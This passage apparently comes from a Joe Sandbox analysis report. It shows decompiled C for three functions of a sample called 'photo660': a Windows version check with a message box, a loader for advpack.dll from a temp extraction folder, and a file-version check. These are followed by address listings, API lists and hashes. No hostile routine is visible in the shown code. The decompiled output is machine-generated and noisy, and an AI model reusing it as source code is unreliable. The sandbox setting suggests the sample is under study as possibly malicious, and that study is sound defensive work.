						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00BC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00BC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xbc8a38 & 0x00000001;
											if(( *0xbc8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("photo660");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00BC681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00BC67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00BC28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xbc9a40 = _t119;
						 *0xbc8184 = 1;
						 *0xbc8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xbc9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xbc8184 = _t135;
							 *0xbc8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00BC44B9(0, _t138);
					L66:
					return E00BC6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                        0x00bc36f9
                                                                                                                                                                                                        0x00bc3700
                                                                                                                                                                                                        0x00bc370c
                                                                                                                                                                                                        0x00bc3716
                                                                                                                                                                                                        0x00bc3718
                                                                                                                                                                                                        0x00bc371b
                                                                                                                                                                                                        0x00bc3721
                                                                                                                                                                                                        0x00bc372b
                                                                                                                                                                                                        0x00bc373d
                                                                                                                                                                                                        0x00bc3745
                                                                                                                                                                                                        0x00bc3746
                                                                                                                                                                                                        0x00bc3746
                                                                                                                                                                                                        0x00bc3749
                                                                                                                                                                                                        0x00bc37ab
                                                                                                                                                                                                        0x00bc37ad
                                                                                                                                                                                                        0x00bc37ae
                                                                                                                                                                                                        0x00bc37b3
                                                                                                                                                                                                        0x00bc37b8
                                                                                                                                                                                                        0x00bc37b8
                                                                                                                                                                                                        0x00bc37bf
                                                                                                                                                                                                        0x00bc37bf
                                                                                                                                                                                                        0x00bc37c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37cb
                                                                                                                                                                                                        0x00bc37cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37d5
                                                                                                                                                                                                        0x00bc37db
                                                                                                                                                                                                        0x00bc37e8
                                                                                                                                                                                                        0x00bc37ea
                                                                                                                                                                                                        0x00bc37ea
                                                                                                                                                                                                        0x00bc37ea
                                                                                                                                                                                                        0x00bc37f0
                                                                                                                                                                                                        0x00bc37f6
                                                                                                                                                                                                        0x00bc3805
                                                                                                                                                                                                        0x00bc3817
                                                                                                                                                                                                        0x00bc382b
                                                                                                                                                                                                        0x00bc3830
                                                                                                                                                                                                        0x00bc3836
                                                                                                                                                                                                        0x00bc383b
                                                                                                                                                                                                        0x00bc383d
                                                                                                                                                                                                        0x00bc38eb
                                                                                                                                                                                                        0x00bc38eb
                                                                                                                                                                                                        0x00bc38f2
                                                                                                                                                                                                        0x00bc390c
                                                                                                                                                                                                        0x00bc3911
                                                                                                                                                                                                        0x00bc3911
                                                                                                                                                                                                        0x00bc3913
                                                                                                                                                                                                        0x00bc394d
                                                                                                                                                                                                        0x00bc394d
                                                                                                                                                                                                        0x00bc394f
                                                                                                                                                                                                        0x00bc38a9
                                                                                                                                                                                                        0x00bc38a9
                                                                                                                                                                                                        0x00bc38b0
                                                                                                                                                                                                        0x00bc38b2
                                                                                                                                                                                                        0x00bc38b9
                                                                                                                                                                                                        0x00bc38bb
                                                                                                                                                                                                        0x00bc38c1
                                                                                                                                                                                                        0x00bc3975
                                                                                                                                                                                                        0x00bc38c7
                                                                                                                                                                                                        0x00bc38de
                                                                                                                                                                                                        0x00bc38e0
                                                                                                                                                                                                        0x00bc38e0
                                                                                                                                                                                                        0x00bc397b
                                                                                                                                                                                                        0x00bc397d
                                                                                                                                                                                                        0x00bc39a9
                                                                                                                                                                                                        0x00bc397f
                                                                                                                                                                                                        0x00bc3982
                                                                                                                                                                                                        0x00bc398b
                                                                                                                                                                                                        0x00bc398d
                                                                                                                                                                                                        0x00bc398f
                                                                                                                                                                                                        0x00bc399f
                                                                                                                                                                                                        0x00bc39a1
                                                                                                                                                                                                        0x00bc3991
                                                                                                                                                                                                        0x00bc3991
                                                                                                                                                                                                        0x00bc3991
                                                                                                                                                                                                        0x00bc398f
                                                                                                                                                                                                        0x00bc39af
                                                                                                                                                                                                        0x00bc39b6
                                                                                                                                                                                                        0x00bc3a0f
                                                                                                                                                                                                        0x00bc3a0f
                                                                                                                                                                                                        0x00bc3a11
                                                                                                                                                                                                        0x00bc3a13
                                                                                                                                                                                                        0x00bc3a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc39b8
                                                                                                                                                                                                        0x00bc39b8
                                                                                                                                                                                                        0x00bc39ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc39bc
                                                                                                                                                                                                        0x00bc39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc39c3
                                                                                                                                                                                                        0x00bc39c9
                                                                                                                                                                                                        0x00bc39ce
                                                                                                                                                                                                        0x00bc39d0
                                                                                                                                                                                                        0x00bc39e3
                                                                                                                                                                                                        0x00bc39e5
                                                                                                                                                                                                        0x00bc39e6
                                                                                                                                                                                                        0x00bc39f1
                                                                                                                                                                                                        0x00bc39f7
                                                                                                                                                                                                        0x00bc39fa
                                                                                                                                                                                                        0x00bc3a01
                                                                                                                                                                                                        0x00bc3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3a06
                                                                                                                                                                                                        0x00bc3a09
                                                                                                                                                                                                        0x00bc3a09
                                                                                                                                                                                                        0x00bc3a0b
                                                                                                                                                                                                        0x00bc3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3a09
                                                                                                                                                                                                        0x00bc39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc39fc
                                                                                                                                                                                                        0x00bc39d3
                                                                                                                                                                                                        0x00bc39d8
                                                                                                                                                                                                        0x00bc39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc39dc
                                                                                                                                                                                                        0x00bc39b6
                                                                                                                                                                                                        0x00bc3955
                                                                                                                                                                                                        0x00bc395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3961
                                                                                                                                                                                                        0x00bc3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3969
                                                                                                                                                                                                        0x00bc3915
                                                                                                                                                                                                        0x00bc3915
                                                                                                                                                                                                        0x00bc391b
                                                                                                                                                                                                        0x00bc391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc392d
                                                                                                                                                                                                        0x00bc3933
                                                                                                                                                                                                        0x00bc3938
                                                                                                                                                                                                        0x00bc393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3940
                                                                                                                                                                                                        0x00bc3946
                                                                                                                                                                                                        0x00bc394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38f2
                                                                                                                                                                                                        0x00bc3843
                                                                                                                                                                                                        0x00bc3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc384b
                                                                                                                                                                                                        0x00bc384d
                                                                                                                                                                                                        0x00bc3883
                                                                                                                                                                                                        0x00bc3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc389a
                                                                                                                                                                                                        0x00bc389e
                                                                                                                                                                                                        0x00bc389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a0
                                                                                                                                                                                                        0x00bc38a0
                                                                                                                                                                                                        0x00bc38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38a4
                                                                                                                                                                                                        0x00bc384f
                                                                                                                                                                                                        0x00bc3851
                                                                                                                                                                                                        0x00bc3857
                                                                                                                                                                                                        0x00bc386e
                                                                                                                                                                                                        0x00bc3877
                                                                                                                                                                                                        0x00bc387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3881
                                                                                                                                                                                                        0x00bc3859
                                                                                                                                                                                                        0x00bc385c
                                                                                                                                                                                                        0x00bc3862
                                                                                                                                                                                                        0x00bc3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc38f4
                                                                                                                                                                                                        0x00bc38f4
                                                                                                                                                                                                        0x00bc38f5
                                                                                                                                                                                                        0x00bc38fb
                                                                                                                                                                                                        0x00bc3901
                                                                                                                                                                                                        0x00bc3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc390a
                                                                                                                                                                                                        0x00bc374b
                                                                                                                                                                                                        0x00bc374e
                                                                                                                                                                                                        0x00bc375c
                                                                                                                                                                                                        0x00bc3764
                                                                                                                                                                                                        0x00bc3769
                                                                                                                                                                                                        0x00bc376e
                                                                                                                                                                                                        0x00bc3771
                                                                                                                                                                                                        0x00bc379c
                                                                                                                                                                                                        0x00bc379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37a3
                                                                                                                                                                                                        0x00bc37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc37a4
                                                                                                                                                                                                        0x00bc3773
                                                                                                                                                                                                        0x00bc3777
                                                                                                                                                                                                        0x00bc3778
                                                                                                                                                                                                        0x00bc377f
                                                                                                                                                                                                        0x00bc3781
                                                                                                                                                                                                        0x00bc378e
                                                                                                                                                                                                        0x00bc378e
                                                                                                                                                                                                        0x00bc3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3794
                                                                                                                                                                                                        0x00bc3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3785
                                                                                                                                                                                                        0x00bc378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc378c
                                                                                                                                                                                                        0x00bc3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc372d
                                                                                                                                                                                                        0x00bc372d
                                                                                                                                                                                                        0x00bc396b
                                                                                                                                                                                                        0x00bc396b
                                                                                                                                                                                                        0x00bc396c
                                                                                                                                                                                                        0x00bc396e
                                                                                                                                                                                                        0x00bc396f
                                                                                                                                                                                                        0x00bc3a1e
                                                                                                                                                                                                        0x00bc3a1e
                                                                                                                                                                                                        0x00bc3a22
                                                                                                                                                                                                        0x00bc3a27
                                                                                                                                                                                                        0x00bc3a3e
                                                                                                                                                                                                        0x00bc3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00BC3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00BC39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,photo660,00000030), ref: 00BC39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$photo660
                                                                                                                                                                                                        • API String ID: 2519184315-2999727582
                                                                                                                                                                                                        • Opcode ID: 5300d79a0ccc059ba4dcd8212e7347a936bbc8573abc1ce31fb93590a0ae44d9
                                                                                                                                                                                                        • Instruction ID: 10f24635f68193ef9747ad93aa88bd72a88237c1fa4b975123b6765e8d7528ab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5300d79a0ccc059ba4dcd8212e7347a936bbc8573abc1ce31fb93590a0ae44d9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B091E571B012149FDB758B15CC81FAA77F0EB49B04F9581EEE84AA7251DB718F80CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00BC6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00BC1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E00BC658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00BC6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                        0x00bc6495
                                                                                                                                                                                                        0x00bc6495
                                                                                                                                                                                                        0x00bc64a0
                                                                                                                                                                                                        0x00bc64a7
                                                                                                                                                                                                        0x00bc64ab
                                                                                                                                                                                                        0x00bc64bd
                                                                                                                                                                                                        0x00bc64c2
                                                                                                                                                                                                        0x00bc64d3
                                                                                                                                                                                                        0x00bc64df
                                                                                                                                                                                                        0x00bc64e8
                                                                                                                                                                                                        0x00bc6502
                                                                                                                                                                                                        0x00bc64ee
                                                                                                                                                                                                        0x00bc64f9
                                                                                                                                                                                                        0x00bc64f9
                                                                                                                                                                                                        0x00bc6516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00BC6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-179718922
                                                                                                                                                                                                        • Opcode ID: 22e4744a34ad3ba2143b7492f7f92c48473544f30089c30b6aab83870808bfb3
                                                                                                                                                                                                        • Instruction ID: 2335033accfd0f0a444ea2a7aa34e60ba615b0ddd90f22708dcd4c1601490935
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22e4744a34ad3ba2143b7492f7f92c48473544f30089c30b6aab83870808bfb3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC018171A0410CABDB50EB64DC49FEA77B8EB69314F6001DDF585A31D0DF70AE8A8A51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC28E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00BC2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00BC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00BC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                        0x00bc28f1
                                                                                                                                                                                                        0x00bc28f4
                                                                                                                                                                                                        0x00bc28f7
                                                                                                                                                                                                        0x00bc28f9
                                                                                                                                                                                                        0x00bc28fc
                                                                                                                                                                                                        0x00bc28ff
                                                                                                                                                                                                        0x00bc2901
                                                                                                                                                                                                        0x00bc2907
                                                                                                                                                                                                        0x00bc2a62
                                                                                                                                                                                                        0x00bc2a64
                                                                                                                                                                                                        0x00bc290d
                                                                                                                                                                                                        0x00bc290d
                                                                                                                                                                                                        0x00bc290f
                                                                                                                                                                                                        0x00bc2912
                                                                                                                                                                                                        0x00bc2920
                                                                                                                                                                                                        0x00bc2937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2944
                                                                                                                                                                                                        0x00bc294a
                                                                                                                                                                                                        0x00bc294f
                                                                                                                                                                                                        0x00bc2a2f
                                                                                                                                                                                                        0x00bc2a32
                                                                                                                                                                                                        0x00bc2a34
                                                                                                                                                                                                        0x00bc2a37
                                                                                                                                                                                                        0x00bc2a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2955
                                                                                                                                                                                                        0x00bc295e
                                                                                                                                                                                                        0x00bc2962
                                                                                                                                                                                                        0x00bc2969
                                                                                                                                                                                                        0x00bc296f
                                                                                                                                                                                                        0x00bc2974
                                                                                                                                                                                                        0x00bc298c
                                                                                                                                                                                                        0x00bc2a20
                                                                                                                                                                                                        0x00bc2a21
                                                                                                                                                                                                        0x00bc2a27
                                                                                                                                                                                                        0x00bc2a4c
                                                                                                                                                                                                        0x00bc2a4f
                                                                                                                                                                                                        0x00bc2a50
                                                                                                                                                                                                        0x00bc2a53
                                                                                                                                                                                                        0x00bc2a56
                                                                                                                                                                                                        0x00bc2a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc29b2
                                                                                                                                                                                                        0x00bc29b2
                                                                                                                                                                                                        0x00bc29b5
                                                                                                                                                                                                        0x00bc29bd
                                                                                                                                                                                                        0x00bc29c3
                                                                                                                                                                                                        0x00bc29cc
                                                                                                                                                                                                        0x00bc29d5
                                                                                                                                                                                                        0x00bc29d7
                                                                                                                                                                                                        0x00bc29da
                                                                                                                                                                                                        0x00bc29dd
                                                                                                                                                                                                        0x00bc29df
                                                                                                                                                                                                        0x00bc29ec
                                                                                                                                                                                                        0x00bc29f8
                                                                                                                                                                                                        0x00bc29fc
                                                                                                                                                                                                        0x00bc29ff
                                                                                                                                                                                                        0x00bc2a02
                                                                                                                                                                                                        0x00bc2a07
                                                                                                                                                                                                        0x00bc2a0a
                                                                                                                                                                                                        0x00bc2a0f
                                                                                                                                                                                                        0x00bc2a19
                                                                                                                                                                                                        0x00bc2a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2a0f
                                                                                                                                                                                                        0x00bc298c
                                                                                                                                                                                                        0x00bc2974
                                                                                                                                                                                                        0x00bc2962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc294f
                                                                                                                                                                                                        0x00bc2912
                                                                                                                                                                                                        0x00bc2a65
                                                                                                                                                                                                        0x00bc2a68
                                                                                                                                                                                                        0x00bc2a6c
